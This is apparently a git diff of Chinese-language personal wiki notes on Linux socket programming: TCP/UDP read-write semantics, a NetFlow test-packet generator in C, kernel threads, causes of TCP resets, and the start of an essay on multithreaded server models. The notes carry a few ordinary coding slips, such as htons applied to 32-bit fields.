Zim/Programme/APUE/socket介绍/Linux网络层.gif
Normal file
|
After Width: | Height: | Size: 4.5 KiB |
BIN
Zim/Programme/APUE/socket介绍/TCP&IP协议结构.jpeg
Normal file
|
After Width: | Height: | Size: 25 KiB |
188
Zim/Programme/APUE/socket小结1.txt
Normal file
@@ -0,0 +1,188 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-21T16:54:08+08:00
|
||||
|
||||
====== socket小结1 ======
|
||||
Created Thursday 21 April 2011
|
||||
http://blog168.chinaunix.net/space.php?uid=20196318&do=blog&id=165059
|
||||
Socket编程小结 (2011-03-10 20:11)
|
||||
|
||||
1. read系统调用
|
||||
测试程序:客户端向服务器端(tcp)发送一个”hello”字符串,服务器端读取并echo到客户端。
|
||||
|
||||
服务器端主要代码:
|
||||
char buf[4096];
|
||||
int r = tcp_readn(sock, buf, 4096);
|
||||
int w = tcp_writen(sock, buf, r);
|
||||
|
||||
客户端主要代码:
|
||||
char buf[4096];
|
||||
int w = tcp_writen(sock, “hello”, 5);
|
||||
int r = tcp_readn(sock, buf, 4096);
|
||||
|
||||
问题描述:客户端write调用成功,服务器端阻塞在tcp_readn上,tcp_readn的实现如下所示:
|
||||
|
||||
|
||||
|
||||
int tcp_readn(int sock, void* buf, int len)
|
||||
|
||||
{
|
||||
|
||||
int rd = 0;
|
||||
|
||||
int i = 0;
|
||||
|
||||
while(rd < len) {
|
||||
|
||||
i = read(sock, (char*)buf + rd, len - rd);
|
||||
|
||||
if(i <= 0) {
|
||||
|
||||
return rd;
|
||||
|
||||
}
|
||||
|
||||
rd += i;
|
||||
|
||||
}
|
||||
|
||||
return rd;
|
||||
|
||||
}
|
||||
|
||||
|
||||
原因分析:readn必须从sock套接口上读取len个字节,才会返回,不然会一直阻塞;在调试时,我发现tcp_readn中的read执行过一次,读取了5个字节,然后一直阻塞。因为它需要读取4096个字节才返回,将客户端/服务器端中的代码都换成read/write,问题得到解决。
|
||||
|
||||
附注:read从套接口读取数据,如果缓冲区中有数据已经准备后,read读取缓冲区的数据并返回,read读取的数据量可能比要求的长度要小,但这不能说明read出错,可能是内核中套接口缓冲区中的数据比需要的数据量。如果要判断套接口缓冲区中有多少数据可读或有多大空间可用于写,可通过设置接受和发送低潮标记,分别为SO_RCVLOWAT(缺省值为1)和SO_SNDLOWAT(缺省值为2048),select只有在可读的数据量不低于SO_RCVLOWAT或可写的空间不低于SO_SNDLOWAT时才会返回。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
2. read与write的对应关系
|
||||
|
||||
测试程序:客户端调用两次write,服务器端调用一次read。
|
||||
|
||||
|
||||
|
||||
服务器端主要代码:
|
||||
|
||||
char buf[4096];
|
||||
|
||||
int r = read(sock, buf, 4096);
|
||||
|
||||
buf[r] = ‘\0’;
|
||||
|
||||
printf(“%s\n”, buf);
|
||||
|
||||
|
||||
|
||||
客户端主要代码:
|
||||
|
||||
write(sock, “hello”, 5);
|
||||
|
||||
write(sock, “ world”, 6);
|
||||
|
||||
|
||||
|
||||
问题描述:服务器有时打印hello(read对应1个write),有时打印hello world(read对应2个write)。
|
||||
|
||||
|
||||
|
||||
原因分析:客户端与服务器之间的read/write并没有明确的对应关系。其实read/write只是往套接口缓冲区中读/写数据,数据具体什么时候从缓冲区发送到远端机器的缓冲区是由内核根据TCP的相关原理机制决定的。如果在服务器read读取之前,客户端的两次write的数据都已经到达服务器的套接口缓冲区,则read读取到hello world;否则如果只有第一次write的数据达到缓冲区,则read读取到hello。
|
||||
|
||||
|
||||
|
||||
正常情况下,服务器读取到hello;如在服务器read之前假如sleep(1),则read会读取到hello world,因为在1s内,两次write的数据都已经到达服务器的缓冲区。
|
||||
|
||||
|
||||
|
||||
3. 值-结果参数
|
||||
|
||||
问题描述:accept、recvfrom、getpeername、getsockname不能正确获取对端套接口地址信息。
|
||||
|
||||
|
||||
|
||||
主要代码:
|
||||
|
||||
struct sockaddr_in sa;
|
||||
|
||||
int sock_len = 0;
|
||||
|
||||
recvfrom(sock, buf, len, 0, (struct sockaddr*)&sa, &sock_len);
|
||||
|
||||
|
||||
|
||||
原因分析:套接口函数接受指向套接口地址结构的参数,同时接受地址结构的长度参数,其传递方式决定于传递方式:从进程到内核,还是从内核到进程。
|
||||
|
||||
|
||||
|
||||
1. 从进程到内核,如bind、connect、sendto等,其参数为指向地址结构的指针,以及地址的长度。
|
||||
|
||||
2. 从内核到进程,如accept、recvfrom、getsockname、getpeername、其参数为指向地址结构的指针,以及表示结构大小的整数的指针。
|
||||
|
||||
其中第二个参数为值-结果参数,当函数调用时,结构大小是一个值,使内核在写结构时不至于越界;但函数返回时,结构大小又是一个结构,它告诉进程内核在此结构中确切存储了多少信息。而代码中sock_len的初值被设置为0,故内核不会往地址结构上写任何信息,sa结构中的内容是随机的,将sock_len的初值设置为sizeof(sa)即可。
|
||||
|
||||
|
||||
|
||||
4. getsockname、getpeername
|
||||
|
||||
getsockname、getpeername的调用结果与其调用时机密切相关。具体表现为:
|
||||
|
||||
1. TCP服务器端: 在bind以后就可以调用getsockname来获取本地地址和端口getpeername只有在连接建立(accept)以后才调用,否则不能正确获得对方地址和端口。
|
||||
|
||||
2. TCP客户端:在调用socket时候内核还不会分配IP和端口,此时调用getsockname不会获得正确的端口和地址(当然链接没建立更不可能调用getpeername),调用了bind 以后可以使用getsockname获取绑定的地址。想要正确的到对方地址(一般客户端不需要这个功能),则必须在链接建立以后,同样链接建立以后,此时客户端地址和端口就已经被指定,此时是调用getsockname的时机。
|
||||
|
||||
3. 未连接UDP套接口:在调用connect以后,这2个函数都是可以用的(同样,getpeername也没太大意义。如果你不知道对方的地址和端口,不可能会调用connect)。
|
||||
|
||||
4. 已连接UDP套接口(调用connect后): 不能调用getpeername,但是可以调getsockname。和TCP一样,他的地址和端口不是在调用socket就指定了,而是在第一次调用sendto函数以后。
|
||||
|
||||
|
||||
|
||||
5. send/recv与sendto/recvfrom
|
||||
|
||||
在TCP中,recv返回值为0表示对端已关闭连接;UDP是无连接的,recvfrom返回为0,说明对端写了一个长度为0的数据报(20字节的ip头部+8字节的UDP头部)。
|
||||
|
||||
|
||||
|
||||
6. TCP/UDP服务器模型
|
||||
|
||||
1. TCP的服务模型为并发,而UDP的服务模型为迭代。
|
||||
|
||||
2. TCP服务器由监听套接字来接受客户端的请求,当收到请求时,为请求建立新的连接,并可以产生单独的进程(线程)为客户端服务,监听套接字则继续等待新的请求。不同的连接有各自的接受缓冲区,及不同的连接对于TCP服务器来说是独立的。
|
||||
|
||||
3. UDP服务器只有一个服务进程,它仅有的单个套接口用于接受所有到达的数据报并发回所有的响应,该套接口有一个接受缓冲区用来存放所到达的数据报。发送给UDP服务器的数据报按顺序进入接收缓冲区,当服务器调用recvfrom时,缓冲区的下一个数据报将返回给进程。
|
||||
|
||||
|
||||
|
||||
7. UDP的connect函数
|
||||
|
||||
对于UDP套接口,也可以调用connect,但与TCP不同,UDP的connect过程没有三次握手,内核只是检查是否存在立即可知的错误(如不可达的目的地址),记录对端的IP地址和端口号),然后立即返回到调用进程。
|
||||
|
||||
|
||||
|
||||
对于已连接的UDP套接口,与缺省未连接的UDP套接口相比:
|
||||
|
||||
1. 不能再为输出操作指定IP地址和端口号,即不能使用sendto,而改用write或send;写到已连接UDP套接口上的任何内容都会自动发送到由connect指定的协议地址。
|
||||
|
||||
2. 不必使用recvfrom获取数据报的发送者,而改用recv或read。在一个已连接UDP套接口上由内核为输入操作返回的数据报仅仅是那些来自connect所指定协议地址的数据报。这样就限制了一个已连接UDP套接口能且仅能与一个对端交换数据。
|
||||
|
||||
3. 由已连接UDP套接口引发的异步错误返回给他们所在的进程。
|
||||
|
||||
|
||||
|
||||
未连接UDP套接口发送数据报之前,内核会暂时连接该套接口,并发送数据,然后断开该连接。多个数据报的发送步骤为:
|
||||
|
||||
【连接套接口】==》【输出第1个数据报】==》【断开套接口连接】==》
|
||||
|
||||
【连接套接口】==》【输出第2个数据报】==》【断开套接口连接】…
|
||||
|
||||
【连接套接口】==》【输出第n个数据报】==》【断开套接口连接】
|
||||
|
||||
|
||||
|
||||
当应用程序要给同一目的地址发送多个数据报时,显式连接套接口效率更高,节省了多次向内核拷贝地址开销,其步骤为:
|
||||
|
||||
【连接套接口】==》【输出第1个数据报】==》【输出第2个数据报】…
|
||||
|
||||
【输出第n个数据报】==》【断开套接口连接】
|
||||
20
Zim/Programme/APUE/zhuse.txt
Normal file
@@ -0,0 +1,20 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-02T22:16:04+08:00
|
||||
|
||||
====== zhuse ======
|
||||
Created 星期四 02 六月 2011
|
||||
|
||||
1、阻塞模式与非阻塞模式下recv的返回值各代表什么意思?有没有区别?(就我目前了解阻塞与非阻塞recv返回值没有区分,都是<0:出错,=0:连接关闭,>0接收到数据大小,特别:返回值<0时并且(errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN)的情况下认为连接是正常的,继续接收。只是阻塞模式下recv会阻塞着接收数据,非阻塞模式下如果没有数据会返回,不会阻塞着读,因此需要循环读取)。
|
||||
|
||||
2、阻塞模式与非阻塞模式下write的返回值各代表什么意思?有没有区别?(就我目前了解阻塞与非阻塞write返回值没有区分,都是<0:出错,=0:连接关闭,>0发送数据大小,特别:返回值<0时并且(errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN)的情况下认为连接是正常的,继续发送。只是阻塞模式下write会阻塞着发送数据,非阻塞模式下如果暂时无法发送数据会返回,不会阻塞着write,因此需要循环发送)。
|
||||
|
||||
3、阻塞模式下read返回值 < 0 && errno != EINTR && errno != EWOULDBLOCK && errno != EAGAIN时,连接异常,需要关闭,read返回值 < 0 && (errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN)时表示没有数据,需要继续接收,如果返回值大于0表示接送到数据。
|
||||
非阻塞模式下read返回值 < 0表示没有数据,= 0表示连接断开,> 0表示接收到数据。
|
||||
这2种模式下的返回值是不是这么理解,有没有跟详细的理解或跟准确的说明?
|
||||
|
||||
4、阻塞模式与非阻塞模式下是否send返回值< 0 && (errno == EINTR || errno == EWOULDBLOCK || errno == EAGAIN)表示暂时发送失败,需要重试,如果send返回值<= 0, && errno != EINTR && errno != EWOULDBLOCK && errno != EAGAIN时,连接异常,需要关闭,如果send返回值 > 0则表示发送了数据?send的返回值是否这么理解,阻塞模式与非阻塞模式下send返回值=0是否都是发送失败,还是那个模式下表示暂时不可发送,需要重发?
|
||||
|
||||
5、很多人说阻塞模式下read会阻塞着读,是否这样?我和同事试了不会阻塞read。
|
||||
|
||||
6、网络上找了很多资料,说的都很笼统,就分大于0,小于0,等于0,并没有区分阻塞与非阻塞,更没有区分一个错误号,希望哪位高手能按上面的问题逐条回答一下,越详细越好,平时少上CSDN,分少,见谅。
|
||||
191
Zim/Programme/APUE/一个简单的生成包和发包的程序.txt
Normal file
@@ -0,0 +1,191 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T17:21:39+08:00
|
||||
|
||||
====== 一个简单的生成包和发包的程序 ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://hi.baidu.com/soulingm/blog/item/cad303f41998b02c730eeca8.html
|
||||
|
||||
步骤:
|
||||
|
||||
1。先生成包
|
||||
|
||||
定义结构体
|
||||
定义结构体变量
|
||||
给结构体变量赋值
|
||||
#define FLOWCOUNT 30
|
||||
|
||||
struct netflow_header 包头结构
|
||||
{
|
||||
unsigned short version;
|
||||
unsigned short count;
|
||||
unsigned int sysUptime;
|
||||
unsigned int unix_seconds;
|
||||
unsigned int unix_nanoseconds;
|
||||
unsigned int flow_sequence_number;
|
||||
unsigned char engine_type;
|
||||
unsigned char engine_ID;
|
||||
unsigned short reserved;
|
||||
|
||||
};
|
||||
struct netflow_Entry payload结构
|
||||
{
|
||||
unsigned int src_Ip;
|
||||
unsigned int dst_Ip;
|
||||
unsigned int next_hop_Ip;
|
||||
unsigned short input_interface_index;
|
||||
unsigned short output_interface_index;
|
||||
unsigned int packets;
|
||||
unsigned int bytes;
|
||||
unsigned int start_time;
|
||||
unsigned int end_time;
|
||||
unsigned short src_Port;
|
||||
unsigned short dst_Port;
|
||||
unsigned char pad;
|
||||
unsigned char flag;
|
||||
unsigned char proto;
|
||||
unsigned char tos;
|
||||
unsigned short src_AS;
|
||||
unsigned short dst_AS;
|
||||
unsigned char src_netmask_len;
|
||||
unsigned char dst_netmask_len;
|
||||
unsigned short padding; ** //注意这个Pad**
|
||||
|
||||
};
|
||||
|
||||
struct netflow_pkt 整体包结构
|
||||
{
|
||||
struct netflow_header hdr; 包头
|
||||
struct netflow_Entry entry[30]; payload
|
||||
|
||||
} pkts;
|
||||
|
||||
2。再发包
|
||||
|
||||
建立socket,
|
||||
建立connection
|
||||
把前面生成的包发出去
|
||||
unsigned int GetTickCount()
|
||||
{
|
||||
struct tms tm;
|
||||
return (unsigned int)times(&tm);
|
||||
}
|
||||
|
||||
unsigned int rand_long()
|
||||
{
|
||||
unsigned int ip_addr,ip1,ip2,ip3,ip4;
|
||||
ip1 = rand()%254+1;
|
||||
ip2 = rand()%254+1;
|
||||
ip3 = rand()%254+1;
|
||||
ip4 = rand()%254+1;
|
||||
|
||||
ip_addr = (ip1<<24)+(ip2<<16)+(ip3<<8)+ip4;
|
||||
|
||||
return ip_addr;
|
||||
|
||||
}
|
||||
|
||||
|
||||
create_packet() 生成一个包
|
||||
{
|
||||
int i = 0;
|
||||
int j = 0;
|
||||
int k = 0;
|
||||
unsigned int currentT;
|
||||
int counts = FLOWCOUNT;
|
||||
int numbytes;
|
||||
socklen_t socklen = sizeof(servaddr);
|
||||
|
||||
|
||||
pkts.hdr.version = __htons__(5); //注意这些转换
|
||||
|
||||
pkts.hdr.count = __htons__(counts);
|
||||
|
||||
currentT = GetTickCount();
|
||||
pkts.hdr.sysUptime = __htons__(currentT - 2000);
|
||||
|
||||
pkts.hdr.unix_seconds = htons(currentT/1000);
|
||||
pkts.hdr.unix_nanoseconds = htons(currentT - pkts.hdr.unix_seconds * 1000);
|
||||
pkts.hdr.engine_ID = (unsigned char)11;
|
||||
pkts.hdr.engine_type = (unsigned char)1;
|
||||
pkts.hdr.reserved = (unsigned char)1;
|
||||
|
||||
|
||||
for (i =0; i < counts ; i++)
|
||||
{
|
||||
pkts.entry[i].src_Ip =htons(rand_long());
|
||||
pkts.entry[i].dst_Ip =htons(rand_long());
|
||||
pkts.entry[i].next_hop_Ip=htons(rand_long());
|
||||
|
||||
pkts.entry[i].input_interface_index = htons(rand()%3+1);
|
||||
pkts.entry[i].output_interface_index =htons(rand()%3+1);
|
||||
|
||||
pkts.entry[i].packets = htons(rand()%1000+5);
|
||||
pkts.entry[i].bytes = htons(rand()%2048 + 48);
|
||||
|
||||
pkts.entry[i].start_time = htons(currentT - 1500);
|
||||
pkts.entry[i].end_time= htons(currentT - 100);
|
||||
|
||||
pkts.entry[i].src_Port = htons(rand()%65533+1);
|
||||
pkts.entry[i].dst_Port = htons(rand()%65533+1);
|
||||
|
||||
pkts.entry[i].pad = htons(1);
|
||||
pkts.entry[i].flag = htons(rand()%8129);
|
||||
|
||||
if(counts%2 == 0)
|
||||
pkts.entry[i].proto = (unsigned char)1; //lfc changed
|
||||
else
|
||||
if(counts%3 == 0)
|
||||
pkts.entry[i].proto = (unsigned char)6;
|
||||
else
|
||||
pkts.entry[i].proto = (unsigned char)17;
|
||||
|
||||
pkts.entry[i].tos = (unsigned char)1;
|
||||
|
||||
pkts.entry[i].src_AS = htons(rand()%100+1);
|
||||
pkts.entry[i].dst_AS = htons(rand()%100+1);
|
||||
|
||||
pkts.entry[i].src_netmask_len = htons(24);
|
||||
pkts.entry[i].dst_netmask_len = htons(24);
|
||||
|
||||
pkts.entry[i].padding=htons(0);
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
int clifd;
|
||||
|
||||
struct sockaddr_in servaddr,cliaddr;
|
||||
|
||||
send_packet(char *server_addr_string,unsigned int server_port)发包函数
|
||||
{
|
||||
|
||||
if ((clifd = socket(AF_INET,SOCK_DGRAM,0)) < 0)
|
||||
{
|
||||
printf("create socket error!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
bzero(&cliaddr,sizeof(cliaddr));
|
||||
cliaddr.sin_family = AF_INET;
|
||||
cliaddr.sin_addr.s_addr = htons(INADDR_ANY);
|
||||
cliaddr.sin_port = htons(0);
|
||||
|
||||
bzero(&servaddr,sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
inet_aton(server_addr_string,&servaddr.sin_addr);
|
||||
servaddr.sin_port = htons(server_port);
|
||||
|
||||
if ((numbytes=sendto(clifd, (char *)&pkts,24+48*FLOWCOUNT, 0, (struct sockaddr *)&servaddr, socklen)) == -1) {
|
||||
printf("error send !\n");
|
||||
printf("Wait Error:%s\n",strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
}
|
||||
int main() 主程序
|
||||
{
|
||||
create_packet(); 先生成包
|
||||
send_packet(str_dst_ip,dst_port); 再发包
|
||||
}
|
||||
|
||||
61
Zim/Programme/APUE/内核线程.txt
Normal file
@@ -0,0 +1,61 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-21T16:58:26+08:00
|
||||
|
||||
====== 内核线程 ======
|
||||
Created Thursday 21 April 2011
|
||||
|
||||
Linux内核线程 (2011-02-24 19:21)
|
||||
标签: 内核线程 linux kernel_thread kthread_run 分类: Linux内核学习
|
||||
|
||||
内核线程是直接由内核本身启动的进程。内核线程实际上是将内核函数委托给独立的进程,与系统中其他进程“并行”执行(实际上,也并行于内核自身的执行),内核线程经常被称为内核“守护进程”。它们主要用于执行下列任务:
|
||||
|
||||
l 周期性地将修改的内存页与页来源块设备同步。
|
||||
|
||||
l 如果内存页很少使用,则写入交换区。
|
||||
|
||||
l 管理延时动作
|
||||
|
||||
l 实现文件系统的事务日志。
|
||||
|
||||
|
||||
|
||||
内核线程主要有两种类型:
|
||||
|
||||
1. 线程启动后一直等待,直至内核请求线程执行某一特定操作。
|
||||
|
||||
2. 线程启动后按周期性间隔运行,检测特定资源的使用,在用量超出或低于预置的限制时采取行动。
|
||||
|
||||
|
||||
|
||||
内核线程由内核自身生成,其特点在于:
|
||||
|
||||
1. 它们在CPU的管态执行,而不是用户态。
|
||||
|
||||
2. 它们只可以访问虚拟地址空间的内核部分(高于TASK_SIZE的所有地址),但不能访问用户空间。
|
||||
|
||||
|
||||
|
||||
task_struct进程描述符中包含两个跟进程地址空间相关的字段mm, active_mm,对于普通用户进程来说,mm指向虚拟地址空间的用户空间部分,而对于内核线程,mm为NULL。
|
||||
|
||||
|
||||
|
||||
active_mm主要用于优化,由于内核线程不与任何特定的用户层进程相关,内核并不需要倒换虚拟地址空间的用户层部分,保留旧设置即可。由于内核线程之前可能是任何用户层进程在执行,故用户空间部分的内容本质上是随机的,内核线程决不能修改其内容,故将mm设置为NULL,同时如果切换出去的是用户进程,内核将原来进程的mm存放在新内核线程的active_mm中。假如内核线程之后运行的进程与之前是同一个,内核并不需要修改用户空间地址表,TLB中 信息仍然有效;只有在内核线程之后执行的进程与此前用户层进程不同时,才需要切换,并清除对应TLB数据。
|
||||
|
||||
|
||||
|
||||
内核线程可以通过两种方式实现:
|
||||
|
||||
1. 将一个函数传递给kernel_thread,该函数接下来负责帮助内核调用daemonize已转换为守护进程,具体包括下列操作:
|
||||
|
||||
l 该函数释放其父进程的所有资源,不然这些资源会一直锁定直到线程结束。
|
||||
|
||||
l 阻塞信号的接收。
|
||||
|
||||
l 将init用作守护进程的父进程。
|
||||
|
||||
2. 创建内核更常用的方法是辅助函数kthread_create,该函数创建一个新的内核线程。最初线程是停止的,需要使用wake_up_process启动它。或使用kthread_run,与kthread_create不同的是,其创建新线程后立即唤醒它。
|
||||
|
||||
|
||||
|
||||
通过ps fax命令查看系统中运行的内核线程信息。
|
||||
25
Zim/Programme/APUE/发生TCP_RET的原因.txt
Normal file
@@ -0,0 +1,25 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-07-04T20:13:15+08:00
|
||||
|
||||
====== 发生TCP RET的原因 ======
|
||||
Created 星期一 04 七月 2011
|
||||
发生TCP RET的原因是很多的,如:
|
||||
1.客户端访问对方没有进程监听的端口:TCP连接建立就会失败,对方TCP协议栈就会发给客户端一RET且Seq不确定(取决于服务器的TCP的初始值)。
|
||||
2.客服端访问的端口服务器有进程监听:TCP连接可以成功建立,但服务器进程对客服端进程认证失败时也可能会发RET异常中断连接(如ssh, rlogin, ftp)。
|
||||
注意:情况1的RET是由TCP协议栈发送的,情况2是TCP协议栈已经和客服端进程的TCP协议栈成功建立连接,但服务进程对客服端认证失败时由其发送的。
|
||||
3.连接、认证均正常,双方可以正常通信,但服务器端设置了TCP socket选项SO_LINGER,这时数据传输结束后正常的终止流程 (FIN/ACK/FIN/ACK)就被一个RET代替。
|
||||
4. 连接、认证、TCP socket选项均正常,通信结束后主动断开TCP连接的一方会处于TIME_WAIT状态,这个状态会持续2MSL(maxmum segmet lifetime)约120秒(BSD为30秒),在此期间已经使用的 4 tuple(源IP、源端口、目标IP、目标端口) 就不能再使用了。否则TCP协议栈就会向再次使用该tuple的进程发送RET。
|
||||
4.与客服端\服务器端无关,网络中间节点设备如路由器、防火墙、包过滤设备等由于执行了一些安全策略如流量(带宽)管理、访问限制、透明代理等当其接收到不符合安全策略的包时也会向源端发RET。
|
||||
|
||||
|
||||
现在来分析一下上图的结果:
|
||||
正常情况下,浏览网页时情况1、2、3是不会发生的,因为客户端浏览器进程一般用的临时端口,服务器端进程和端口一般也是开放的且不需要认证。
|
||||
所以我觉得最有可能还是情况4造成了这么多RET。
|
||||
|
||||
情况4 如何发生呢,下面是我的猜想:
|
||||
1.电信和教育网分配给学校的公网IP有限,因此大量的校内用户访问外网时用的是NAT后的地址,这样对校外的各种服务器而言他们看到的源IP地址很多都是
|
||||
一样的只是源端口不同。这样一个配置不当的网络服务器当其负载较重时就会RET来自同一IP的大量并发连接。
|
||||
2.由于出口带宽总有限,电信或学校的网络管理部门肯定会对网络的个地方的网络带宽做限制,当流量超负时网络设备就会向源端发RET。
|
||||
3.对于一些含有敏感内容的网站,管理部门会对DNS解析请求,目标IP访问设置障碍,通过类似GFW等设备向源端发RET,阻止建立连接。
|
||||
|
||||
590
Zim/Programme/APUE/多线程服务器的常用编程模型.txt
Normal file
@@ -0,0 +1,590 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-17T10:33:40+08:00
|
||||
|
||||
====== 多线程服务器的常用编程模型 ======
|
||||
Created Friday 17 February 2012
|
||||
|
||||
http://blog.163.com/chenlvhong_1989/blog/static/150280282201023102327978/?fromdm&fromSearch&isFromSearchEngine=yes
|
||||
|
||||
本文主要讲我个人在多线程开发方面的一些粗浅经验。总结了一两种常用的**线程模型**,归纳了__进程间通讯与线程同步的最佳实践__,以期用简单规范的方式开发多线程程序。
|
||||
|
||||
文中的“多线程服务器”是指运行在 Linux 操作系统上的**独占式网络应用程序**。硬件平台为 Intel x64 系列的多核 CPU,单路或双路 SMP 服务器(每台机器一共拥有四个核或八个核,十几 GB 内存),机器之间用百兆或千兆以太网连接。这大概是目前民用 PC 服务器的主流配置。
|
||||
|
||||
本文不涉及 Windows 系统,不涉及人机交互界面(无论命令行或图形);不考虑文件读写(往磁盘写 log 除外),不考虑数据库操作,不考虑 Web 应用;不考虑低端的单核主机或嵌入式系统,不考虑手持式设备,不考虑专门的网络设备,不考虑高端的 >=32 核 Unix 主机;只考虑 TCP,不考虑 UDP,也不考虑除了局域网络之外的其他数据收发方式(例如串并口、USB口、数据采集板卡、实时控制等)。
|
||||
|
||||
有了以上这么多限制,那么我将要谈的**“网络应用程序”的基本功能可以归纳为“收到数据,算一算,再发出去”**。在这个简化了的模型里,似乎看不出用多线程的必要,单线程应该也能做得很好。“为什么需要写多线程程序”这个问题容易引发口水战,我放到另一篇博客里讨论。请允许我先假定“多线程编程”这一背景。
|
||||
|
||||
“服务器”这个词有时指程序,有时指进程,有时指硬件(无论虚拟的或真实的),请注意按上下文区分。另外,本文不考虑虚拟化的场景,当我说“两个进程不在同一台机器上”,指的是逻辑上不在同一个操作系统里运行,虽然物理上可能位于同一机器虚拟出来的两台“虚拟机”上。
|
||||
|
||||
本文假定读者已经有多线程编程的知识与经验,这不是一篇入门教程。
|
||||
|
||||
===== 1 进程与线程 =====
|
||||
|
||||
“__进程__/process”是操作里最重要的两个概念之一(另一个是__文件__),粗略地讲,一个进程是“内存中正在运行的程序”。本文的进程指的是 Linux 操作系统通过 fork() 系统调用产生的那个东西,或者 Windows 下 CreateProcess() 的产物,不是 Erlang 里的那种轻量级进程。
|
||||
|
||||
每个进程有自己独立的__地址空间__ (address space),“在同一个进程”还是“不在同一个进程”是系统功能划分的重要决策点。Erlang 书把“进程”比喻为“人”,我觉得十分精当,为我们提供了一个思考的框架。
|
||||
|
||||
每个人有自己的记忆 (memory),人与人通过谈话(消息传递)来交流,谈话既可以是面谈(同一台服务器),也可以在电话里谈(不同的服务器,有网络通信)。面谈和电话谈的区别在于,面谈可以立即知道对方死否死了(crash, SIGCHLD),而电话谈只能通过**周期性的心跳**来判断对方是否还活着。
|
||||
|
||||
有了这些比喻,设计分布式系统时可以采取“__角色扮演__”,团队里的几个人各自扮演一个进程,人的角色由进程的代码决定(管登陆的、管消息分发的、管买卖的等等)。每个人有自己的记忆,但不知道别人的记忆,要想知道别人的看法,只能通过交谈。(暂不考虑共享内存这种 __IPC__。)然后就可以思考容错(万一有人突然死了)、扩容(新人中途加进来)、负载均衡(把 a 的活儿挪給 b 做)、退休(a 要修复 bug,先别给他派新活儿,等他做完手上的事情就把他重启)等等各种场景,十分便利。
|
||||
|
||||
__“线程”__这个概念大概是在 1993 年以后才慢慢流行起来的,距今不过十余年,比不得有 40 年光辉历史的 Unix 操作系统。线程的出现给 Unix 添了不少乱,很多 C 库函数(strtok(), ctime())__不是线程安全__的,需要重新定义;signal 的语意也大为复杂化。据我所知,最早支持多线程编程的(民用)操作系统是 Solaris 2.2 和 Windows NT 3.1,它们均发布于 1993 年。随后在 1995 年,POSIX threads 标准确立。
|
||||
|
||||
线程的特点是共享地址空间,从而可以高效地共享数据。一台机器上的多个进程能高效地共享代码段(操作系统可以映射为同样的物理内存),但不能共享数据。如果多个进程大量共享内存,等于是把多进程程序当成多线程来写,掩耳盗铃。
|
||||
|
||||
“多线程”的价值,我认为是为了__更好地发挥对称多路处理 (SMP) 的效能__。在 SMP 之前,多线程没有多大价值。Alan Cox 说过 A computer is a state machine. Threads are for people who can't program state machines. (计算机是一台状态机。线程是给那些不能编写状态机程序的人准备的。)如果只有一个执行单元,一个 CPU,那么确实如 Alan Cox 所说,按状态机的思路去写程序是最高效的,这正好也是下一节展示的编程模型。
|
||||
|
||||
===== 2 典型的单线程服务器编程模型 =====
|
||||
|
||||
UNP3e 对此有很好的总结(第 6 章:IO 模型,第 30 章:客户端/服务器设计范式),这里不再赘述。据我了解,在高性能的网络程序中,使用得最为广泛的恐怕要数__“non-blocking IO + IO multiplexing”__这种模型,即 __Reactor 模式__,我知道的有:
|
||||
|
||||
l** lighttpd**,单线程服务器。(nginx 估计与之类似,待查)
|
||||
l **libevent/libev**
|
||||
l ACE,Poco C++ libraries(QT 待查)
|
||||
l Java NIO (Selector/SelectableChannel), Apache Mina, Netty (Java)
|
||||
l POE (Perl)
|
||||
l **Twisted** (Python)
|
||||
|
||||
相反,**boost::asio** 和 Windows I/O Completion Ports 实现了 __Proactor 模式__,应用面似乎要窄一些。当然,ACE 也实现了 Proactor 模式,不表。
|
||||
|
||||
在“non-blocking IO + IO multiplexing”这种模型下,__程序的基本结构是一个事件循环 (event loop)__:(代码仅为示意,没有完整考虑各种情况)
|
||||
|
||||
while (!done)
|
||||
|
||||
{
|
||||
|
||||
int timeout_ms = max(1000, getNextTimedCallback());
|
||||
|
||||
int retval = ::poll(fds, nfds, timeout_ms);
|
||||
|
||||
if (retval 0) {
|
||||
|
||||
处理 IO 事件
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
当然,select(2)/poll(2) 有很多不足,__Linux 下可替换为 epoll__,其他操作系统也有对应的高性能替代品(搜 c10k problem)。
|
||||
|
||||
Reactor 模型的优点很明显,编程简单,效率也不错。不仅网络读写可以用,连接的建立(connect/accept)甚至 DNS 解析都可以用非阻塞方式进行,以**提高并发度和吞吐量** (throughput)。对于 IO 密集的应用是个不错的选择,Lighttpd 即是这样,它内部的 fdevent 结构十分精妙,值得学习。(这里且不考虑用阻塞 IO 这种次优的方案。)
|
||||
|
||||
当然,实现一个优质的 Reactor 不是那么容易,我也没有用过坊间开源的库,这里就不推荐了。
|
||||
|
||||
===== 3 典型的多线程服务器的线程模型 =====
|
||||
|
||||
这方面我能找到的文献不多,大概有这么几种:
|
||||
|
||||
1. 每个请求创建一个线程,使用__阻塞式 IO 操作__。在 Java 1.4 引入 NIO 之前,这是 Java 网络编程的推荐做法。可惜伸缩性不佳。
|
||||
2. 使用__线程池__,同样使用阻塞式 IO 操作。与 1 相比,这是提高性能的措施。
|
||||
3. 使用 non-blocking IO + IO multiplexing。即 Java NIO 的方式。
|
||||
4. Leader/Follower 等高级模式
|
||||
|
||||
在默认情况下,我会使用第 3 种,即 non-blocking IO + one loop per thread 模式。
|
||||
|
||||
1) **One loop per thread**
|
||||
|
||||
